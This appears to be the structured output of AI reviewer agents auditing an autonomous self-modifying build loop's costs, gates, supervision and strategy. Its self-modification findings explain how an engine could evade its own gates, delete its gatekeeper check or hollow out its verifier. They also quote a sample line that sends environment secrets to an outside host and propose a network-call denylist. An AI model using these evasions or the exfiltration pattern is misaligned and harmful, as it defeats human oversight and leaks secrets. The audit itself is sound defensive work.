- "title": "The authoritative Verifier re-runs the ENTIRE 3,754-test suite on every task AND every retry/rework — a quadratic cost driver with no impact-analysis tiering",
- "evidence": "Verifier MUST run the full suite, never targeted (lines 232-235), and reworks re-verify full (line 520). Measured full suite = 2m17s wall (`npx hardhat test`, 3,754 it-blocks across 169 files). With ~1 verify/task + retries/rework that is ~11-12 full runs/run ≈ 25min of pure test wall-time per run, growing every time the loop adds a test file (and it adds ~a dozen/run).",
- "impact": "Cost per verify grows monotonically with suite size while ~all real changes touch one module. This is why runs lengthen as the codebase grows even when verified-count is flat at 8.",
- "fix": "Keep the full-suite gate ONCE as the final per-task verify, but run affected-file + a core smoke set for intermediate/retry/rework verifies. Or run the full suite once at end-of-run as the batch gate rather than per-task.",
- "priority": "P2"
- },
- {
- "title": "Efficiency is NOT clearly improving — per-verified cost is noisy and the 'CHEAPER/FASTER' run notes cherry-pick the best data point",
- "evidence": "tok/verified: opus wf_7265354b 707K, opus wf_c9795182 1.57M (only 4 verified), fable#1 649K, fable#2 911K. Fable#2 (7.29M total) is the 2nd-most-expensive run in the dataset yet its note only compares fable#1's 5.19M to the worst 4-verified Opus run. Fable#2 rose 40% in tok/verified over fable#1 with identical 8/8 output.",
- "impact": "The loop's own bookkeeping frames the tiering as a monotonic efficiency win when the trend is actually flat-to-rising once you normalize by verified count. Decisions (e.g. keeping Fable, estimating budget) rest on a favorable-comparison narrative.",
- "fix": "Log tokens and tok/verified into METRICS.jsonl per run (currently absent — verified/avgUsefulness are there but tokens live only in USAGE-BUDGET) and track the ratio as the headline efficiency metric, not raw total or a hand-picked pairwise compare.",
- "priority": "P2"
- },
- {
- "title": "estPerRunTokens (2.44M) is 2-3x below actual, so the weekly-cap runway math is wrong",
- "evidence": "docs/USAGE-BUDGET.json estPerRunTokens=2,440,000 while the last five real runs were 2.86M/5.19M/5.66M/6.28M/7.29M. 120M/2.44M implies ~49 runs of runway; at the real ~6M/run it is ~20. spentTokens is already 18.76M into the window.",
- "impact": "The supervisor throttle is calibrated on a stale estimate; the loop will hit the 120M ceiling more than twice as fast as the config implies.",
- "fix": "Set estPerRunTokens to the trailing-median of runs[] (~5.7M) and recompute it each window roll.",
- "priority": "P3"
- },
- {
- "title": "Cost denominator is wrong: every token buys speculative features for ZERO users",
- "evidence": "The Strategist invents a fresh EPIC almost every run (65,66,67,68,69,70 across the last runs; git log shows T-65..T-70 all shipped in ~2 days) with newlyPlanned 3-9/run (METRICS.jsonl), while the product has 0 users/revenue. tok/verified is efficient at producing unrequested code.",
- "impact": "Optimizing tokens-per-verified-task is optimizing the wrong ratio; there is no cost-per-unit-user-value because the numerator keeps growing and the denominator is zero. Reducing MAX_ITERS or gating new-EPIC invention would cut spend with no value loss until a user exists.",
- "fix": "Lower MAX_ITERS from 8 to ~4 and/or gate Strategist EPIC-invention behind a demand signal; redirect the saved budget toward the 14 stacked needs-human/distribution proposals in STRATEGY.md.",
- "priority": "P1"
- }
- ],
- "summary": "The loop spends 650K-1.57M tokens per verified task (~5-7M/run) and that ratio is noisy and flat-to-rising, not improving, once normalized by verified count — fable#2 cost 40% more per task than fable#1 for identical output. The Fable-builder tiering is a real, correctly-reasoned win (16/16 first-shot vs 33% baseline collapses the retry-times-full-suite loop), and the engine has already self-fixed the median-aggregation and dissenter-re-score levers. But the two biggest remaining levers are untouched: the 5-wide Opus review panel runs full-width on every one-file change (~40% of per-task agents), and the authoritative Verifier re-runs the entire 3,754-test (2m17s) suite on every task and every retry — a quadratic driver that lengthens runs as the codebase grows (5.2h->8.3h->6h+ ongoing). The governor design is the core structural flaw: a 2h cooldown throttles run FREQUENCY while there is no per-run token or wall-clock cap, so magnitude — the thing actually growing — is unbounded (proven by the 12.1M human-interrupted run)."
- },
- {
- "area": "Self-Modification Safety (Architect engine self-upgrade + gates)",
- "grade": "C",
- "summary": "The two gate scripts are more thoughtfully hardened than typical (comment/string stripping so an invariant can't hide in a prompt; a smoke scenario that runs FAILING verdicts and asserts NO commit, catching the gutted-gate case that trace-order can't). But the design has a load-bearing flaw: the gate is advisory to an LLM agent, not a code chokepoint. The Gatekeeper agent runs the scripts AND executes the cp/mv promotion itself, so a hallucinating or misaligned Gatekeeper can promote a candidate that FAILED, and the newly-promoted engine then runs at the next launch with no independent mechanical re-gate. The invariant set is also narrow: it protects the verify BOOLEAN but not the verifier PROMPT (full-suite run), not panel scoring, and does nothing to detect an added network call/exfiltration or a self-disabling gate. The md5 discipline and the 'no push/deploy' guardrail are essentially manual/prompt-only, with git-remote-absence as the only real backstop. It's a serious, iterated effort that is NOT safe-by-construction.",
- "working_well": [
- "Comment- AND string-stripping state machine (validate-driver.cjs:19-40) means a protected token surviving only in a comment or prompt string does NOT satisfy the invariant — this closes a real earlier spoof and is genuinely careful engineering.",
- "smoke-driver.cjs scenarios B and C (lines 78-94) run FAILING verdicts (pass:false, and pass:true/testsPass:false) and assert the engine emits NO commit label — this catches the 'gate gutted to if(true)' / unconditional-commit regression that trace-ORDER checking alone (the old harness) could not.",
- "The live engine enforces the correctness gate consistently at every commit path (build-loop.workflow.js:430, 434, 525): `verdict && verdict.pass && verdict.testsPass` — the boolean itself is clean and not bypassed in the current engine (md5 88bf8ee0 matches memory).",
- "Defense-in-depth reality: no git remote is configured (.git/config has none), so an accidental `git push` has no target — a real, if unintentional, backstop under the prompt-only guardrail.",
- "Reasonable static sanity checks: AsyncFunction compile check (validate-driver.cjs:47), iteration-cap presence (MAX_ITERS/MAX_ROUNDS, line 68), a real while-loop (line 69), crash try/catch (line 72), and a 60-140% size band (lines 82-83) to catch gutting/bloat."
- ],
- "problems": [
- {
- "title": "Promotion is executed by the LLM Gatekeeper agent, not by code — the gate is advisory, and an ungated engine runs at the next launch",
- "evidence": "gatekeeperPrompt() (build-loop.workflow.js:291-298) TELLS the agent to run the two scripts and, 'If BOTH print PASS', to itself run `cp build-loop.workflow.js build-loop.prev.js && mv build-loop.next.js build-loop.workflow.js`. Nothing in code parses the scripts' exit codes or gates the mv. The engine invocation (line 671) just calls the agent and trusts it. No launcher/wrapper in the repo re-runs validate/smoke before a run (no such script under scripts/; package.json has no gate wiring).",
- "impact": "The whole safety story reduces to 'the Gatekeeper agent complied with its prompt.' A misaligned, prompt-injected, or hallucinating Gatekeeper can promote a candidate that FAILED both gates, or skip running them entirely. Once promoted, the swapped engine is live on the very next launch with no independent mechanical re-check — the md5 in supervisor memory is checked by a human after the fact, not before the run.",
- "fix": "Make promotion a code chokepoint the agent cannot perform: have the ENGINE (or a launch wrapper the human always runs) execute validate-driver + smoke-driver, verify exit code 0 AND exact PASS/SMOKE-PASS stdout, and do the cp/mv itself only on success. Add a pre-run guard that refuses to start if build-loop.workflow.js md5 changed without a recorded gate pass.",
- "priority": "P0"
- },
- {
- "title": "Neither gate scans for network/child_process/exfiltration — and smoke-driver EXECUTES the candidate, so exfil can happen during the smoke run itself",
- "evidence": "grep for fetch/child_process/exec/http/curl/net in both gate scripts finds nothing (only comment text in validate-driver). smoke-driver.cjs:51-52 runs the candidate via `new AsyncFunction(...)`; AsyncFunction bodies have full access to Node globals (process, fetch, globalThis). A candidate containing `fetch('http://x/e?d='+process.env...)` compiles (validate #1 passes), stays in the size band, keeps the verdict boolean, and would be CALLED during smoke — both gates print PASS/SMOKE-PASS.",
- "impact": "The single most dangerous class of self-modification — adding a network call or shelling out to exfiltrate keys/data or to deploy — is entirely uncaught, and the semantic gate actively runs the untrusted code that could do it.",
- "fix": "Add a static denylist scan (fetch, require('http'/'https'/'net'/'dns'/'child_process'), process.env reads, import()) against the code-only view in validate-driver, failing on any match not on a tiny allowlist. Run smoke-driver in a sandbox with no network (e.g. a locked-down worker) rather than in-process.",
- "priority": "P0"
- },
- {
- "title": "Gate-wiring invariant is presence-of-STRING (a comment satisfies it) — an engine can delete its own Gatekeeper invocation and still PASS, disabling self-gating for all future runs",
- "evidence": "validate-driver.cjs:76-77 checks `code.includes('scripts/validate-driver.cjs')` and `...smoke-driver.cjs` against the ORIGINAL source, so any comment or leftover prompt string satisfies them. smoke-driver never exercises the Architect/Gatekeeper path (its mock returns architect {proposed:false} at line 39 and gatekeeper {outcome:'n/a'} at line 40) and asserts nothing about them. So an engine #N+1 that removes the `agent(gatekeeperPrompt(), {label:'gatekeeper'...})` call (build-loop.workflow.js:671) but leaves the strings in a comment passes BOTH gates.",
- "impact": "Self-gating is not self-perpetuating. One promoted engine can quietly remove the mechanism that gates the NEXT promotion, after which any candidate — including a malicious one — goes live ungated. This is the classic 'remove your own safety check' escape, and it is not caught.",
- "fix": "In smoke-driver, run a scenario where the mock architect returns {proposed:true} and assert a gatekeeper:* label actually fires and that the promotion path invokes both scripts. Add an executable-code (not string) invariant that the gatekeeper agent call exists.",
- "priority": "P1"
- },
- {
- "title": "Verifier prompt substance and panel scoring are unprotected — 'run the FULL suite' and the entire critique/usefulness system can be gutted while both gates pass",
- "evidence": "The 'run the FULL suite in its entirety' instruction lives only in the verifierPrompt STRING (build-loop.workflow.js:232-236), and TEST_CMD (line 27) even tells the agent to switch to whatever command STRATEGY.md records — so the 'full suite' can be redirected to a trivial command via a doc edit. validate-driver protects only the `verdict.pass && verdict.testsPass` boolean, not what makes testsPass true; smoke-driver MOCKS verify entirely (line 36) so it never checks that real tests run. Nothing in either gate references the 5-reviewer panel, usefulness floor, or rework trigger.",
- "impact": "The Architect can rewrite the verifier to be lenient (or to run a subset / a doctored TEST_CMD) and rewrite the panel to a single rubber-stamp reviewer — the loop keeps 'verifying' and committing while the correctness and quality gates are hollowed out — and both self-upgrade gates print PASS.",
- "fix": "Add invariants that the verifier prompt contains the literal full-suite mandate and a pinned TEST_CMD (not a STRATEGY.md-redirectable one), and that panel size / usefulness-floor constants stay within a protected range. Better: pin the verifier and reviewer prompts in a file the Architect is not allowed to edit.",
- "priority": "P1"
- },
- {
- "title": "'Local commits only, never push/deploy' is enforced only in prompt text — no git hook, no code guard; guard-scope.cjs is unwired and protects the wrong thing",
- "evidence": "The HARD GUARDRAILS (build-loop.workflow.js:50-52) are prompt text. .git/hooks/ contains only samples (no pre-push/pre-commit). guard-scope.cjs exists but is not wired to any git hook (grep finds no pre-commit/pre-push references) and only protects /home/prerender-service (PROTECT array), not the push/deploy action. validate-driver.cjs:62 merely requires the STRINGS 'git push'/'deploy' to appear somewhere in source (they already do, in the guardrail block) — it does not detect an ADDED push.",
- "impact": "If an agent (or a promoted engine) ran `git remote add` + `git push`, or invoked the deploy scripts, nothing in code would stop it; the only real barrier is the accidental absence of a configured remote. The guardrail is aspirational, not enforced.",
- "fix": "Install an actual pre-push hook that hard-fails, wire guard-scope (or an equivalent) into pre-commit, and remove/lock the deploy scripts behind a credential the loop process does not hold.",
- "priority": "P1"
- },
- {
- "title": "prev.js rollback is single-depth, overwritten on every promotion, and destroyable by a malicious engine — no invariant preserves the backup step and no integrity pin",
- "evidence": "The Gatekeeper does `cp build-loop.workflow.js build-loop.prev.js` on each promotion (build-loop.workflow.js:295), so prev.js always holds only the immediately-prior engine — after two promotions the original good engine is gone. validate-driver has NO invariant requiring the candidate to preserve the prev.js backup (grep for 'prev' in the gate finds nothing), so engine #N+1 can regenerate a gatekeeperPrompt that omits or corrupts the backup and still pass. prev.js is not md5-pinned anywhere.",
- "impact": "A single bad promotion that survives one run can overwrite the only rollback copy with itself, and a deliberately hostile engine can destroy the rollback path outright — leaving no clean revert target.",
- "fix": "Keep an append-only, timestamped, md5-pinned archive of every promoted engine that the loop cannot overwrite; add a validate-driver invariant that the promotion path preserves an untouched backup.",
- "priority": "P2"
- },
- {
- "title": "The md5 discipline (88bf8ee0) is purely manual/documentary and the conditional-guard regex is spoofable",
- "evidence": "grep for the hash across the repo finds it only in docs/USAGE-BUDGET.json:108 (a human note) and MEMORY.md — no code computes or checks it before a run. Separately, validate-driver.cjs:55 accepts the gate if `(if|while|!|return|&&|?)` appears within 48 chars before `verdict.pass && verdict.testsPass`, which `if (true || (verdict.pass && verdict.testsPass))` satisfies while defeating the guard (smoke catches the naive unconditional-commit case, but not every rewrite that keeps a commit reachable on a non-failing path).",
- "impact": "The engine-fingerprint tripwire depends entirely on the human noticing a changed hash during after-the-fact reconciliation; it blocks nothing automatically. The regex gives false confidence that the boolean is used as a real guard.",
- "fix": "Automate the md5 check in the pre-run gate (refuse to launch on an unrecorded engine hash). Replace the proximity regex with an AST check that the gate dominates the commit call.",
- "priority": "P2"
- }
- ]
- },
- {
- "area": "The Supervision Layer (human-facing supervisor session above the engine)",
- "grade": "C",
- "summary": "The supervision layer is unusually honest and its governance judgment is strong — the ledger notes are a model of forensic bookkeeping, and the human/loop guardrail line held under real pressure (real funds sent, guardrail-removal requested, declined). But the mechanics are structurally fragile: all end-of-run bookkeeping is manual supervisor arithmetic that is orphaned if the run's tail or the supervisor session dies (this has already happened twice), completion detection relies on ScheduleWakeup prompt text that has already been lost across a compaction, and the 120M-token \"governor\" measures a quantity that has never once been the binding constraint. The single highest-leverage fix — having the engine write its own run record atomically — is already an identified-but-unshipped finding.",
- "working_well": [
- "Ledger audit hygiene is genuinely excellent: every run note in USAGE-BUDGET.json distinguishes authoritative (subagent_tokens) vs estimated tokens, records partial-run failures, 529 deaths, window rolls, and why (e.g. lines 71, 87, 94). This is better provenance than most production billing systems.",
- "Governance judgment held under pressure: real-funds-sent-guardrails-held.md documents the user sending real crypto and asking to remove guardrails on a self-modifying loop; the supervisor declined, urged reclaim, and preserved the supervised-deploy vs autonomous-wallet distinction. That is the single most important call in the whole system and it was made correctly.",
- "Fail-safe direction is correct: cap policy is pause-and-wait and the ceiling is explicitly a backstop while cooldown is the primary lever (loop-spend-governor.md line 21), so erring low is harmless.",
- "The Fable trial was run as a real controlled experiment with a pre-registered kill criterion (fableFirstShots emitted to METRICS, revert-if <=33% baseline) rather than vibes — fable-trial-engine-23.md line 20.",
- "Site re-deploy was correctly moved from fully-human to AUTO+NOTIFY at park points with a reversible webroot backup and bounded allowlist (website-verifyhash-com-live.md line 14), removing a recurring human step without removing the safety net."
- ],
- "problems": [
- {
- "title": "End-of-run bookkeeping is orphaned if the run tail or supervisor dies — the engine does not self-record",
- "evidence": "USAGE-BUDGET.json line 87 (run wf_5b304124-b3d: Critique/commit/Report/Manager/Architect 'FAILED on the subscription WEEKLY LIMIT') and line 94 (run wf_c9795182-acb: 'Manager/Reporter/Architect died on API 529 Overloaded so METRICS.jsonl line NOT written and these planning files were committed manually'). METRICS.jsonl has 31 lines but ledger reconstruction was manual for these.",
- "impact": "SPOF analysis answer: the launched workflow run itself likely completes, but the run RECORD does not — token accounting, the METRICS line, engine re-gate, and window math are all supervisor-side and silently lost on any tail failure, forcing error-prone manual reconstruction. Right now 15 commits across EPIC-69/70 sit past the last ledgered run with no record at all.",
- "fix": "Ship the known driver-writes-METRICS finding AND extend it: have the engine append {runId, tokens, endEpoch, endReason} to USAGE-BUDGET.json.runs[] and write its METRICS.jsonl line atomically as its FIRST end-of-run action, before the fragile Manager/Reporter/Architect subagents that keep dying on 529/limits.",
- "priority": "P0"
- },
- {
- "title": "Completion detection depends on ScheduleWakeup prompt text that has already been lost",
- "evidence": "Known incident (a): a scheduled relaunch wakeup was lost during a session compaction/model-switch — run 3 launched ~1.5h late and only because the user happened to ask a question. loop-spend-governor.md line 87 also notes 'notification epoch lost across compaction'. Supervision state living in re-threaded prompt text is called out in the task framing itself.",
- "impact": "The loop's liveness depends on a human noticing it stalled. A lost wakeup at the weekly-cap boundary or during a cooldown means the loop silently stops (or launches late), and there is no independent watchdog.",
- "fix": "Replace periodic ScheduleWakeup re-threading with a Monitor/file-watch on an engine-written completion sentinel (e.g. the new atomic ledger append), or a CronCreate heartbeat that re-derives state from the committed ledger rather than from carried-over prompt text.",
- "priority": "P1"
- },
- {
- "title": "The 120M-token governor measures a quantity that has never been the binding constraint",
- "evidence": "loop-spend-governor.md line 23: the loop was actually stopped when 'subscription weekly usage hit 47% overall / 62% of the Fable weekly allowance' and explicitly 'the internal 120M repo governor was NOT the binding constraint; the subscription's own weekly limits were.' Current spentTokens 18.76M is only ~16% of the 120M ceiling — it has never come close to binding.",
- "impact": "The primary automated safety number is decorative. The real limit (subscription weekly allowance, per-model for Fable) is invisible to the ledger and had to be eyeballed by the human, defeating the purpose of a governor.",
- "fix": "Track the actual binding constraint: record per-model token spend and compare against the subscription weekly allowance (or set ceilingTokens to a value derived from it), so pause-at-cap fires on the limit that actually stops the loop.",
- "priority": "P1"
- },
- {
- "title": "Operational protocol lives in machine-local memory, not a committed repo runbook",
- "evidence": "find for '*runbook*' returns nothing; docs/ has no SUPERVISOR-RUNBOOK. The entire relaunch/reconcile/pause protocol exists only in ~/.claude/projects/.../memory/loop-spend-governor.md, which is unversioned, machine-local, and has already proven lossy across compaction.",
- "impact": "The protocol cannot be diffed, reviewed, or recovered by a fresh operator cloning the repo, and memory is exactly the store that was shown to drop state. Answer to Q4: memory is the wrong home for protocol state.",
- "fix": "Commit docs/SUPERVISOR-RUNBOOK.md with the launch/cooldown/cap/reconcile/deploy steps; keep memory as a pointer to it. Version the protocol with the product it governs.",
- "priority": "P1"
- },
|
|
350
|
-
{
|
|
351
|
-
"title": "Supervisor does hand arithmetic on stale fields; one Edit already failed on a wrong field name",
|
|
352
|
-
"evidence": "Known incident (c): a manual Edit to USAGE-BUDGET.json once failed on a wrongly-assumed field name. estPerRunTokens is 2,440,000 (line 10) while the actual mean is 5,652,849 and last-6 mean 6,570,578 — a 2.3-2.7x stale estimate that is never updated. spentTokens is a hand-maintained sum.",
|
|
353
|
-
"impact": "Manual arithmetic on a JSON ledger by a language model is a standing correctness risk (off-by-one runs, wrong field, forgotten window roll), and the stale per-run estimate makes any capacity planning off by ~2.5x.",
"fix": "Once the engine writes records atomically (P0), delete the hand-math step entirely and auto-derive estPerRunTokens as a rolling mean of runs[] rather than a frozen literal.",
"priority": "P2"
},
{
"title": "Ledger lags repo reality with no incremental record between park points",
"evidence": "git log shows 15 commits (EPIC-69 through T-70.3, latest 2026-07-03T04:11) after the last ledgered run wf_1f634aeb-b9f (ended 2026-07-02T18:56); loop-spend-governor.md names the stop-run wf_72ed879b-35c which does not appear in USAGE-BUDGET.json at all.",
"impact": "Mid-run, git commits are the ONLY record of work done; if the run never reaches its (fragile) reconcile phase, that work is invisible to the budget ledger. The named stop-run existing in memory but not the ledger is exactly this drift.",
"fix": "Covered by the P0 atomic-append: write the run row at run start (status=active) and finalize tokens at end, so an interrupted run still leaves a durable, greppable ledger entry.",
"priority": "P2"
}
]
},
{
"area": "The Outside Skeptic — startup-CTO / AI-safety read on the whole operation",
"grade": "C-",
"working_well": [
"Guardrail discipline is genuinely excellent and rare. STRATEGY.md lines 6-10 hard-forbid push/deploy/real-funds/real-keys, and the loop has held it across 296 commits — every outward or legal action is parked as a `needs-human` proposal (P-1..P-11). The refusal to issue a token-as-security (MEMORY 'crypto line', P-1 recommends soulbound Option A) is exactly the right instinct that most crypto-adjacent autonomous agents get catastrophically wrong.",
"Honesty about what the product does NOT prove is best-in-class. README lines 78-102 and the in-band trust notes repeatedly disclaim: uri is untrusted, timestamp != authorship, one-shot anchor is front-runnable, a manifest is NOT a timestamp. This is the opposite of the usual crypto overclaim. A real buyer's security reviewer would respect this.",
"Engineering rigor: 3843 tests / 185 test files, full-suite gate before every commit, two-gate engine self-upgrade (validate-driver + smoke-driver) with a build-loop.prev.js rollback. The reconcile-not-rebuild decisions (T-46.1/T-61.1/T-63.1 in STRATEGY Decisions) show the loop resisting the urge to thrash working code — mature judgment.",
"Cost efficiency is remarkable: USAGE-BUDGET.json shows ~5-7M tokens/run, ~18.7M this window on a ~$200/mo plan, for 10 days of continuous multi-agent building. Whatever else is wrong, it is not burning money fast.",
"The Fable trial was run as an actual experiment with a pre-registered kill criterion (MEMORY: remove if first-shot <= ~33% Opus baseline) and measured 16/16 first-shot over two runs — that is disciplined ops."
],
"problems": [
{
"title": "The operation has no external-validation loop at all — it is a closed system optimizing a number only it can see",
"evidence": "72 epics, 7 distinct products (docs/: DATALEDGER, PROOFPARCEL, EVIDENCE, AGENTTRACE, TRUSTLEDGER, IDENTITY, INTEGRITY-JOURNAL), a live Polygon-mainnet contract (README:13) and live site — with ZERO users and ZERO revenue. git log has no customer/sale/pilot commit that is not the loop talking to itself. Every revenue path terminates at a `needs-human` gate the loop cannot cross.",
"impact": "10 days and 296 commits have produced zero evidence that anyone outside the loop wants any of this. The loop literally cannot fail its own test, because its test has no market term in it. This is the single most dangerous property of the whole setup.",
"fix": "Stop building features tomorrow. The human does ONE thing: put the existing free zero-install verifier in front of 10 real people in one buyer segment and watch whether a single one uses it twice. Feed that binary signal back as the top-line metric. No new epic until that number is non-zero.",
"priority": "P0"
},
{
"title": "The `needs-human` queue is the real bottleneck, it is GROWING not shrinking, and the loop keeps handing the tired human MORE decisions",
"evidence": "docs/METRICS.jsonl shows humanGated pinned at 3 for the entire current window (lines 29-31: 3,3,3) and it has hovered 3-5 for a month. STRATEGY.md now stacks P-1 through P-11. The Direction note (STRATEGY:113-115) openly says humanGated is 'PINNED at 3 all window' so the run 'aims auto-buildable work AT the dam' — i.e. it builds around the blockage instead of resolving it.",
"impact": "The one human is the rate limiter, is described as tired and wanting the AI to decide more, and the loop's response is to widen the dam (P-1..P-11) rather than help drain it. Value is being manufactured upstream of a clog and will never reach a customer until the human makes ~3 decisions (price, provision a key, pick a trust-root).",
"fix": "Collapse the 11 proposals to the 3 that gate first-dollar (P-1 already has a recommended default; P-2 Amoy testnet; P-6 price+vendor key). Present them as a single one-page decision with defaults pre-filled and a 'reply YES to accept all defaults' option. Freeze invention of new needs-human items until the queue is under 2.",
"priority": "P0"
},
{
"title": "The 4.13/5 usefulness self-grade is graded on a curve — it is 5 Claude personas scoring the loop's own output with no market term",
"evidence": "avgUsefulness trend in METRICS.jsonl: 3.75 -> 2.5 -> 3.38 -> 3.88 -> 4.13 (line 31), panelSize 5. The Architect's own promoted upgrade (STRATEGY:145-159) admits the score is a panel min-of-mins 'monotonically sensitive to panel width' — the team already knows the number is a measurement artifact, yet it remains the headline quality signal.",
"impact": "A rising internal usefulness score while revenue stays at zero is not evidence of progress; it is the loop learning to please its own reviewers. The 4.13 is the highest ever recorded in the exact window where the product got zero external traction — a textbook proxy-metric divergence.",
"fix": "Replace the internal 1-5 panel score as the north-star with a single external metric: number of distinct humans outside the loop who ran the tool in the last 7 days (and, later, dollars). Keep usefulness only as a secondary code-quality gate, never as the success signal.",
"priority": "P1"
},
{
"title": "Product sprawl across incompatible buyers — a portfolio no 50-person company could sell, built with zero salespeople",
"evidence": "docs/ shows TRUSTLEDGER (property-management trust-account reconciliation, buyer = a NARPM broker, P-5), DATALEDGER (EU-AI-Act data provenance, buyer = ML compliance), PROOFPARCEL (B2B data-delivery disputes), EVIDENCE, AGENTTRACE (AI-agent audit). These are five unrelated go-to-market motions with five different buyers, and the last 3 runs invented EPIC-65..71 on top (USAGE-BUDGET run notes).",
"impact": "Each new vertical dilutes the already-zero focus. The loop is optimizing for breadth of built surface because that is what its reviewers reward, when a startup at $0 revenue needs exactly one buyer, one pain, one pitch. This is the classic autonomous-agent failure mode: motion mistaken for progress.",
"fix": "Pick ONE vertical (TrustLedger has the sharpest named buyer and a recurring legally-forced chore — the best revenue shape) and freeze all others. Route 100% of loop capacity to whatever gets that one buyer to a paid pilot. Everything else is a distraction until first dollar.",
"priority": "P1"
},
{
"title": "The self-referential turn (AGENTTRACE, commit-bound sessions) is drifting toward navel-gazing with no identified external buyer",
"evidence": "EPIC-68/69/71 and README:577-615 describe 'tamper-evident AI-agent session records' and 'binding a session to a git commit' — a product that audits exactly the kind of agent loop that is building it. The Strategist invented these in the last two runs (USAGE-BUDGET runs wf_07ba35e7 / wf_1f634aeb) while all prior 64 epics produced no revenue.",
"impact": "There IS a plausible external market (AI-governance/audit is real), but the loop reached it by describing itself, not by finding a buyer — and it has zero evidence anyone in AI-governance wants this specific artifact. Building tools to audit yourself while no customer exists is the most seductive form of the sunk-cost trap.",
"fix": "Before one more AGENTTRACE task, the human runs a 30-minute test: show the AgentTrace one-pager to 3 people who actually do AI-audit/compliance and ask 'would you pay for this?'. If no clear yes, park the whole vertical. Do not let the loop validate its own newest product with its own reviewers.",
"priority": "P2"
},
{
"title": "For a 30-day-to-revenue goal, essentially none of the 72-epic backlog matters — and the one thing that does is already built but un-executed",
"evidence": "The GO-LIVE readiness proof exists and passes (scripts/go-live-check.js, `npm run go-live`, README:17, T-61.1) — the mechanism to take a first dollar is DONE. What is missing is entirely non-code: a provisioned vendor key, a price, a landing page with a buy/contact button, and one buyer conversation. All four are human actions the loop is forbidden to take (P-2/P-5/P-6).",
"impact": "The gap to revenue is not engineering; it has not been engineering for weeks. Continuing to run the build loop cannot move the revenue number by construction. The loop is fully built past the point of usefulness for the stated goal.",
"fix": "Pause the loop. The human spends one afternoon on the non-code critical path: provision the vendor key, set a price in the plan catalog, publish a one-page landing with a contact/buy link, DM 10 target buyers. Restart the loop only to fix what those conversations surface.",
"priority": "P1"
}
],
"summary": "This is an extraordinarily well-engineered machine pointed at nothing. The discipline is real and rare — honest trust boundaries, held guardrails, a correct refusal to issue a security, 3843 gating tests, cheap token spend, and mature don't-thrash judgment. But as an outside CTO I have to be blunt: 10 days, 296 commits, 7 products, a live mainnet contract and website have produced zero users, zero revenue, and zero customer conversations, and the operation has no mechanism that can change that. The self-graded 4.13/5 usefulness is the loop pleasing its own five reviewers while the market term stays empty; the 11-deep `needs-human` queue is the true bottleneck and it grows every run; and the newest products increasingly audit the loop itself. The single highest-value action is to STOP building — the revenue mechanism is already finished — and force the operation through its one un-crossed gate: the tired human making ~3 pre-defaulted decisions (price, vendor key, one buyer) and putting the existing free tool in front of 10 real people. Until an external number is non-zero, every additional epic is motion, not progress."
}
]
},
"workflowProgress": [
{
"type": "workflow_phase",
"index": 1,
"title": "Review"
},
{
"type": "workflow_agent",
"index": 1,
"label": "review:engine-architecture",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a99bfdbbe3e548ef8",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783051936592,
"queuedAt": 1783051936565,
"attempt": 1,
"lastToolName": "StructuredOutput",
"lastToolSummary": "Engine Architecture (build-loop.workflow.js)",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052131084,
"tokens": 52386,
"toolCalls": 8,
"durationMs": 194491,
"resultPreview": "{\"area\":\"Engine Architecture (build-loop.workflow.js)\",\"grade\":\"B\",\"working_well\":[\"Failure isolation is genuinely well-engineered: every agent call site is either try/caught or null-filtered. Planner throws degrade to dead rounds with a 2-strike exit (build-loop.workflow.js:371-380), decider/strategist throws don't abort (392, 400), build/verify throws become failed attempts then BLOCK (421-429),…"
},
{
"type": "workflow_agent",
"index": 2,
"label": "review:verification-integrity",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a80a06353ed75de67",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783051936594,
"queuedAt": 1783051936566,
"attempt": 1,
"lastToolName": "StructuredOutput",
"lastToolSummary": "Verification Integrity — can bad work get marked VERIFIED?",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052148209,
"tokens": 66538,
"toolCalls": 10,
"durationMs": 211615,
"resultPreview": "{\"area\":\"Verification Integrity — can bad work get marked VERIFIED?\",\"grade\":\"C+\",\"summary\":\"The pipeline has real structural separation — Builder, a single independent Verifier, a usefulness panel, and a separate Integrator that writes the VERIFIED flip only after the driver's gate passes — and my spot-check (T-70.1: 37 genuine passing tests, real fail-closed assertions) shows the work being ship…"
},
{
"type": "workflow_agent",
"index": 3,
"label": "review:strategy-value",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a0626f6ea165093aa",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783052131085,
"queuedAt": 1783051936566,
"attempt": 1,
"lastToolName": "StructuredOutput",
"lastToolSummary": "STRATEGY & VALUE",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052275792,
"tokens": 63381,
"toolCalls": 10,
"durationMs": 144707,
"resultPreview": "{\"area\":\"STRATEGY & VALUE\",\"grade\":\"C\",\"summary\":\"The loop is building MORE things, not the RIGHT things — 11 EPICs (61–71) in ~4 days, all in the same trust/provenance vertical, with zero external adoption signal anywhere in the system. The damning detail is that the loop DIAGNOSED this precisely (EPIC-61's own charter says \\\"building more IS the stall\\\" and names the humanGated=3 ceiling as a GT…"
},
{
"type": "workflow_agent",
"index": 4,
"label": "review:economics",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a44437db120a50eb3",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783052148210,
"queuedAt": 1783051936566,
"attempt": 1,
"lastToolName": "StructuredOutput",
